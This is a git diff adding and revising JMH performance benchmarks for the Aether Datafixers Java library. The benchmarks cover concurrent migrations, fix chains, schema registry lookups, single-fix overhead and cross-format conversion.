diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
new file mode 100644
index 0000000..f402cf8
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -0,0 +1,219 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.concurrent;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.DataVersion;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.fix.DataFixer;
+import de.splatgames.aether.datafixers.api.schema.Schema;
+import de.splatgames.aether.datafixers.api.schema.SchemaRegistry;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
+import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import de.splatgames.aether.datafixers.core.schema.SimpleSchemaRegistry;
+import de.splatgames.aether.datafixers.testkit.factory.MockSchemas;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Threads;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.Random;
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for concurrent migration and registry access performance.
+ *
+ * <p>Measures the thread-safety and contention characteristics of the
+ * DataFixer and SchemaRegistry under concurrent load.
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
+@OutputTimeUnit(TimeUnit.MICROSECONDS)
+@State(Scope.Benchmark)
+@Warmup(iterations = 3, time = 2, timeUnit = TimeUnit.SECONDS)
+@Measurement(iterations = 5, time = 2, timeUnit = TimeUnit.SECONDS)
+@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
+public class ConcurrentMigrationBenchmark {
+
+ @Param({"SMALL", "MEDIUM"})
+ private PayloadSize payloadSize;
+
+ // Shared state across threads
+ private DataFixer sharedFixer;
+ private DataFixer sharedChainFixer;
+ private SchemaRegistry sharedRegistry;
+ private DataVersion fromVersion;
+ private DataVersion toVersion;
+ private DataVersion chainToVersion;
+ private DataVersion[] registryVersions;
+
+ @Setup(Level.Trial)
+ public void setup() {
+ // Create shared fixer (thread-safe after freeze)
+ this.sharedFixer = BenchmarkBootstrap.createSingleFixFixer();
+ this.sharedChainFixer = BenchmarkBootstrap.createChainFixer(10);
+ this.fromVersion = new DataVersion(1);
+ this.toVersion = new DataVersion(2);
+ this.chainToVersion = new DataVersion(11);
+
+ // Create shared registry
+ final SimpleSchemaRegistry registry = new SimpleSchemaRegistry();
+ this.registryVersions = new DataVersion[100];
+ for (int i = 0; i < 100; i++) {
+ final int version = (i + 1) * 10;
+ this.registryVersions[i] = new DataVersion(version);
+ registry.register(MockSchemas.minimal(version));
+ }
+ registry.freeze();
+ this.sharedRegistry = registry;
+ }
+
+ /**
+ * Per-thread state for independent test data.
+ */
+ @State(Scope.Thread)
+ public static class ThreadState {
+
+        private Dynamic<JsonElement> threadInput;
+ private Random random;
+
+ @Setup(Level.Iteration)
+ public void setup(final ConcurrentMigrationBenchmark parent) {
+ // Each thread gets its own input data
+ this.threadInput = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, parent.payloadSize);
+ this.random = new Random();
+ }
+ }
+
+ // ==================== Concurrent Migration ====================
+
+ /**
+ * Benchmarks concurrent single-fix migrations using all available processors.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(Threads.MAX)
+ public void concurrentSingleFix(final ThreadState state, final Blackhole blackhole) {
+        final Dynamic<JsonElement> result = this.sharedFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ state.threadInput,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks concurrent chain migrations using all available processors.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(Threads.MAX)
+ public void concurrentChainMigration(final ThreadState state, final Blackhole blackhole) {
+        final Dynamic<JsonElement> result = this.sharedChainFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ state.threadInput,
+ this.fromVersion,
+ this.chainToVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks concurrent migrations with 4 threads.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(4)
+ public void fourThreadMigration(final ThreadState state, final Blackhole blackhole) {
+        final Dynamic<JsonElement> result = this.sharedFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ state.threadInput,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks concurrent migrations with 8 threads.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(8)
+ public void eightThreadMigration(final ThreadState state, final Blackhole blackhole) {
+        final Dynamic<JsonElement> result = this.sharedFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ state.threadInput,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ // ==================== Concurrent Registry Access ====================
+
+ /**
+ * Benchmarks concurrent schema registry lookups.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(Threads.MAX)
+ public void concurrentRegistryLookup(final ThreadState state, final Blackhole blackhole) {
+ final int index = state.random.nextInt(this.registryVersions.length);
+ final Schema schema = this.sharedRegistry.get(this.registryVersions[index]);
+ blackhole.consume(schema);
+ }
+
+ /**
+ * Benchmarks concurrent latest schema access.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(Threads.MAX)
+ public void concurrentLatestLookup(final Blackhole blackhole) {
+ final Schema schema = this.sharedRegistry.latest();
+ blackhole.consume(schema);
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
new file mode 100644
index 0000000..90818ff
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
@@ -0,0 +1,149 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.core;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.DataVersion;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.fix.DataFixer;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
+import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for multi-fix chain migration performance.
+ *
+ * <p>Measures the performance of applying multiple sequential fixes,
+ * simulating real-world migration scenarios where data may need to
+ * traverse many version upgrades.
All fixes in the chain perform the same operation type (rename),
+ * measuring sequential fix application overhead.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void renameChain(final Blackhole blackhole) {
+        final Dynamic<JsonElement> result = this.chainFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.input,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks applying a chain of mixed fix types.
+ *
+     * <p>Includes rename, add, remove, and transform operations
+ * for more realistic migration scenarios.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void mixedChain(final Blackhole blackhole) {
+ if (this.mixedFixer == null) {
+ // Skip for fixCount < 4
+ blackhole.consume(this.input);
+ return;
+ }
+        final Dynamic<JsonElement> result = this.mixedFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.input,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks partial migration (half the chain).
+ *
+     * <p>Measures performance when migrating to an intermediate version
+ * rather than the latest version.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void partialChain(final Blackhole blackhole) {
+ final int halfwayVersion = Math.max(2, (this.fixCount / 2) + 1);
+        final Dynamic<JsonElement> result = this.chainFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.input,
+ this.fromVersion,
+ new DataVersion(halfwayVersion));
+ blackhole.consume(result);
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
new file mode 100644
index 0000000..d895b69
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -0,0 +1,148 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.core;
+
+import de.splatgames.aether.datafixers.api.DataVersion;
+import de.splatgames.aether.datafixers.api.schema.Schema;
+import de.splatgames.aether.datafixers.api.schema.SchemaRegistry;
+import de.splatgames.aether.datafixers.core.schema.SimpleSchemaRegistry;
+import de.splatgames.aether.datafixers.testkit.factory.MockSchemas;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.Random;
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for schema registry lookup performance.
+ *
+ * <p>Measures the performance of {@link SchemaRegistry#get(DataVersion)}
+ * with varying registry sizes. Uses floor semantics (finds greatest version
+ * less than or equal to requested).
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
+@OutputTimeUnit(TimeUnit.NANOSECONDS)
+@State(Scope.Benchmark)
+@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
+@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
+@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
+public class SchemaLookupBenchmark {
+
+ @Param({"10", "50", "100", "500"})
+ private int schemaCount;
+
+ private SchemaRegistry registry;
+ private DataVersion[] versions;
+ private DataVersion[] lookupVersions;
+ private Random random;
+
+ @Setup(Level.Trial)
+ public void setup() {
+ // Create registry with specified number of schemas
+ final SimpleSchemaRegistry simpleRegistry = new SimpleSchemaRegistry();
+ this.versions = new DataVersion[this.schemaCount];
+
+ for (int i = 0; i < this.schemaCount; i++) {
+ final int version = (i + 1) * 10; // 10, 20, 30, ...
+ this.versions[i] = new DataVersion(version);
+ simpleRegistry.register(MockSchemas.minimal(version));
+ }
+ simpleRegistry.freeze();
+ this.registry = simpleRegistry;
+
+ // Create lookup versions (including versions between registered versions)
+ this.lookupVersions = new DataVersion[this.schemaCount * 2];
+ for (int i = 0; i < this.lookupVersions.length; i++) {
+ this.lookupVersions[i] = new DataVersion((i + 1) * 5); // 5, 10, 15, ...
+ }
+
+ this.random = new Random(42); // Fixed seed for reproducibility
+ }
+
+ /**
+ * Benchmarks looking up an exact registered version.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void exactLookup(final Blackhole blackhole) {
+ final int index = this.random.nextInt(this.schemaCount);
+ final Schema schema = this.registry.get(this.versions[index]);
+ blackhole.consume(schema);
+ }
+
+ /**
+ * Benchmarks looking up a version using floor semantics.
+ *
+     * <p>Half of the lookups will be for exact versions, half will
+ * require floor resolution.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void floorLookup(final Blackhole blackhole) {
+ final int index = this.random.nextInt(this.lookupVersions.length);
+ final Schema schema = this.registry.get(this.lookupVersions[index]);
+ blackhole.consume(schema);
+ }
+
+ /**
+ * Benchmarks getting the latest schema.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void latestLookup(final Blackhole blackhole) {
+ final Schema schema = this.registry.latest();
+ blackhole.consume(schema);
+ }
+
+ /**
+ * Benchmarks sequential lookup of all versions.
+ *
+     * <p>Measures cache-friendly access patterns.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void sequentialLookup(final Blackhole blackhole) {
+ for (final DataVersion version : this.versions) {
+ final Schema schema = this.registry.get(version);
+ blackhole.consume(schema);
+ }
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
new file mode 100644
index 0000000..9e61504
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -0,0 +1,132 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.core;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.DataVersion;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.fix.DataFixer;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
+import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for single DataFix application performance.
+ *
+ * <p>Measures the overhead of applying a single fix to data of varying sizes.
+ * Includes a baseline identity fix measurement to isolate framework overhead.
Measures framework overhead without actual data transformation.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void identityFix(final Blackhole blackhole) {
+        final Dynamic<JsonElement> result = this.identityFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.input,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks applying a fix to player-like data structure.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void playerDataFix(final Blackhole blackhole) {
+        final Dynamic<JsonElement> playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
+        final DataFixer playerFixer = BenchmarkBootstrap.createPlayerFixer();
+        final Dynamic<JsonElement> result = playerFixer.update(
+ BenchmarkBootstrap.PLAYER_TYPE,
+ playerInput,
+ new DataVersion(1),
+ new DataVersion(2));
+ blackhole.consume(result);
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
new file mode 100644
index 0000000..b725afa
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -0,0 +1,187 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.format;
+
+import com.fasterxml.jackson.databind.JsonNode;
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
+import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps;
+import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for cross-format conversion performance.
+ *
+ * <p>Measures the overhead of converting data between different
+ * DynamicOps implementations using {@link DynamicOps#convertTo}.
Measures the overhead of applying a single fix to data of varying sizes.
- * Includes a baseline identity fix measurement to isolate framework overhead.
+ * Includes a baseline identity fix measurement to isolate framework overhead from actual transformation costs.
+ *
+ *
Benchmark Methods
+ *
+ *
{@link #identityFix} - Baseline measurement with no-op transformation
+ *
{@link #singleRenameFix} - Single field rename operation
+ *
{@link #playerDataFix} - Complex object transformation with codec roundtrip
+ *
{@link #playerDataFixEndToEnd} - Full pipeline including setup overhead
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for statistical significance)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Microseconds
+ *
+ *
+ *
Interpreting Results
+ *
+ *
Throughput (ops/us): Higher is better. Operations per microsecond.
+ *
Average Time (us/op): Lower is better. Microseconds per operation.
+ *
Error (±): 99.9% confidence interval. Smaller means more stable results.
+ *
+ *
+ *
Usage
+ *
{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar SingleFixBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar SingleFixBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific payload size only
+ * java -jar benchmarks.jar SingleFixBenchmark -p payloadSize=SMALL
+ * }
Measures the performance of renaming one field in the input data.
+ * This represents a common, lightweight migration operation. The benchmark is parameterized by {@link PayloadSize}
+ * to measure scaling behavior.
+ *
+ * @param s the shared benchmark state containing fixer and input data
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void singleRenameFix(final SizedState s, final Blackhole blackhole) {
+ blackhole.consume(s.fixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ s.input,
+ s.fromVersion,
+ s.toVersion));
}
/**
- * Benchmarks applying a single rename field fix.
+ * Benchmarks the identity (no-op) fix as a baseline measurement.
+ *
+     * <p>Measures pure framework overhead without any actual data transformation.
+ * Use this as a baseline to calculate the true cost of transformations by subtracting identity time from other
+ * benchmark results.
*
+ * @param s the shared benchmark state containing identity fixer and input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void singleRenameFix(final Blackhole blackhole) {
- final Dynamic result = this.fixer.update(
+ public void identityFix(final SizedState s, final Blackhole blackhole) {
+ blackhole.consume(s.identityFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- this.input,
- this.fromVersion,
- this.toVersion);
- blackhole.consume(result);
+ s.input,
+ s.fromVersion,
+ s.toVersion));
}
/**
- * Baseline benchmark with identity fix (no transformation).
+ * Benchmarks a complex player data transformation with codec roundtrip.
*
-     * <p>Measures framework overhead without actual data transformation.
+     * <p>Measures the performance of a realistic migration scenario where data
+ * is decoded via codec, transformed, and re-encoded. This represents the upper bound of migration cost for complex
+ * object transformations.
*
+     * <p>Expected performance: ~17-18 μs/op (significantly slower due to codec overhead)
+ *
+     * <p>The ~70x slowdown compared to {@link #singleRenameFix} is expected and
+ * acceptable, as codec roundtrips involve reflection, object instantiation, and full serialization/deserialization
+ * cycles.
+ *
+ * @param s the shared player benchmark state
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void identityFix(final Blackhole blackhole) {
- final Dynamic result = this.identityFixer.update(
- BenchmarkBootstrap.BENCHMARK_TYPE,
- this.input,
- this.fromVersion,
- this.toVersion);
- blackhole.consume(result);
+ public void playerDataFix(final PlayerState s,
+ final Blackhole blackhole) {
+ blackhole.consume(s.playerFixer.update(
+ BenchmarkBootstrap.PLAYER_TYPE,
+ s.playerInput,
+ s.fromVersion,
+ s.toVersion));
}
/**
- * Benchmarks applying a fix to player-like data structure.
+ * Benchmarks the complete end-to-end pipeline including setup overhead.
+ *
+     * <p>Measures the total cost of a migration including:
+     * <ul>
+     *     <li>Test data generation</li>
+     *     <li>DataFixer bootstrap and initialization</li>
+     *     <li>Actual migration execution</li>
+     * </ul>
+ *
+     * <p>This benchmark is useful for understanding cold-start performance
+ * and the cost of creating new DataFixer instances. In production code,
+ * DataFixers should be reused rather than recreated per-operation.
+ *
+     * <p>Note: Results will be significantly slower than {@link #playerDataFix}
+ * due to setup overhead included in each iteration.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void playerDataFix(final Blackhole blackhole) {
+ public void playerDataFixEndToEnd(final Blackhole blackhole) {
final Dynamic playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
final DataFixer playerFixer = BenchmarkBootstrap.createPlayerFixer();
- final Dynamic result = playerFixer.update(
+ blackhole.consume(playerFixer.update(
